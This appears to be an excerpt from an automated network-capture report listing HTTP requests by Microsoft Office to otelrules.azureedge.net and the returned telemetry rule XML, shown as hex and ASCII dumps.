                                                2024-10-29 23:22:59 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                81192.168.2.45812813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:59 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:59 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:59 GMT
                                                Content-Type: text/xml
                                                Content-Length: 432
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                ETag: "0x8DC582BAABA2A10"
                                                x-ms-request-id: 6741ff86-f01e-00aa-74b9-268521000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232259Z-16849878b78p49s6zkwt11bbkn00000006u000000000qnzu
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:59 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                82192.168.2.45812713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:59 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:59 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:59 GMT
                                                Content-Type: text/xml
                                                Content-Length: 472
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                ETag: "0x8DC582B91EAD002"
                                                x-ms-request-id: 1e165ab9-d01e-007a-4b95-27f38c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232259Z-r197bdfb6b4hsj5bywyqk9r2xw00000008qg00000000869e
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                83192.168.2.45812913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:00 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:00 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:00 GMT
                                                Content-Type: text/xml
                                                Content-Length: 475
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                ETag: "0x8DC582BBA740822"
                                                x-ms-request-id: 4ecf21c8-401e-002a-0558-26c62e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232300Z-17c5cb586f6hhlf5mrwgq3erx800000008rg000000000az3
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:00 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                84192.168.2.45813113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:00 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:00 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:00 GMT
                                                Content-Type: text/xml
                                                Content-Length: 474
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                ETag: "0x8DC582BA4037B0D"
                                                x-ms-request-id: 6c7ab4fb-501e-0078-78bf-2706cf000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232300Z-r197bdfb6b466qclztvgs64z10000000090g0000000020uk
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:00 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                85192.168.2.45813013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:00 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:00 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:00 GMT
                                                Content-Type: text/xml
                                                Content-Length: 427
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                ETag: "0x8DC582BB464F255"
                                                x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232300Z-15b8d89586ff5l62aha9080wv000000008fg00000000d05d
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:00 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                86192.168.2.45813213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:00 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:00 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:00 GMT
                                                Content-Type: text/xml
                                                Content-Length: 419
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                ETag: "0x8DC582BA6CF78C8"
                                                x-ms-request-id: 44c43cee-601e-003e-459c-273248000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232300Z-15b8d89586f8l5961kfst8fpb00000000k0g000000004fue
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                87192.168.2.45813313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:00 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:00 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:00 GMT
                                                Content-Type: text/xml
                                                Content-Length: 472
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                ETag: "0x8DC582B984BF177"
                                                x-ms-request-id: dc27e692-e01e-001f-1e67-281633000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232300Z-15b8d89586fmhkw429ba5n22m800000008s0000000004x96
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:00 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                88192.168.2.45813413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:01 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:01 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:01 GMT
                                                Content-Type: text/xml
                                                Content-Length: 405
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                ETag: "0x8DC582B942B6AFF"
                                                x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232301Z-16849878b78sx229w7g7at4nkg00000005f000000000b9s2
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:01 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                89192.168.2.45813513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:01 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:01 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:01 GMT
                                                Content-Type: text/xml
                                                Content-Length: 468
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                ETag: "0x8DC582BBA642BF4"
                                                x-ms-request-id: fd0e08e6-201e-0085-5f27-2634e3000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232301Z-r197bdfb6b48v72xb403uy6hns00000007t000000000krqp
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:01 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                90192.168.2.45813613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:01 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:01 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:01 GMT
                                                Content-Type: text/xml
                                                Content-Length: 174
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                ETag: "0x8DC582B91D80E15"
                                                x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232301Z-16849878b782d4lwcu6h6gmxnw00000006sg00000000y0w2
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:01 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                91192.168.2.45813713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:01 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:01 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:01 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1952
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                ETag: "0x8DC582B956B0F3D"
                                                x-ms-request-id: ba33cc4f-e01e-0052-2e6f-28d9df000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232301Z-15b8d89586fvk4kmbg8pf84y88000000086g000000002rrd
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:01 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
